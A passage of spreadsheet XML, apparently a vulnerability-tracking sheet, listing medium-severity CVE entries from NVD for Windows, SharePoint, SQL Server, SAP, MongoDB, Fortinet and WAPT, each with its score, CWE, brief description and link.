          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
      <c r="Q376" s="5" t="inlineStr">
        <is>
          <t>CWE-257</t>
        </is>
      </c>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69409</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69497</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69636</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69781</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K380" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69839</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70019</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr">
        <is>
          <t>CWE-65</t>
        </is>
      </c>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73029</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75132</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>WAPT Server versions 2.6.1.17834 and earlier contains a SQL injection vulnerability in the `columns` parameter of the GET `/api/v3/hosts` endpoint. A remote authenticated user with read-only privileges can inject arbitrary PostgreSQL expressions into the SQL query constructed by WAPT. By exploiting the injection point, an attacker can inject additional PostgreSQL statements, bypass the host scope restrictions applied to the account, and read information from other rows or tables within the database.</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75132</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76968</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>SAP Web Dispatcher, Internet Communication Manager and SAP Content Server allows an authenticated low-privileged attacker to access certain administrative functionality or interface and obtain sensitive information about the system state, resulting in information disclosure. This disclosed information could potentially be used to facilitate further attacks. This vulnerability has a high impact on the confidentiality of the application, with no impact on integrity or availability.</t>
        </is>
      </c>
      <c r="S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76971</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>Due to a Server-Side Request Forgery (SSRF) vulnerability in SAP Manufacturing Integration and Intelligence, an attacker could cause the server to initiate arbitrary outbound requests. If processed by the application, this behavior could be combined with XML/XSL processing to enable execution of scripts. Successful exploitation could result in a low impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78453</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K38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387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr"/>
      <c r="Q387" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82059</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82069</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84391</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K39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391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69878</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
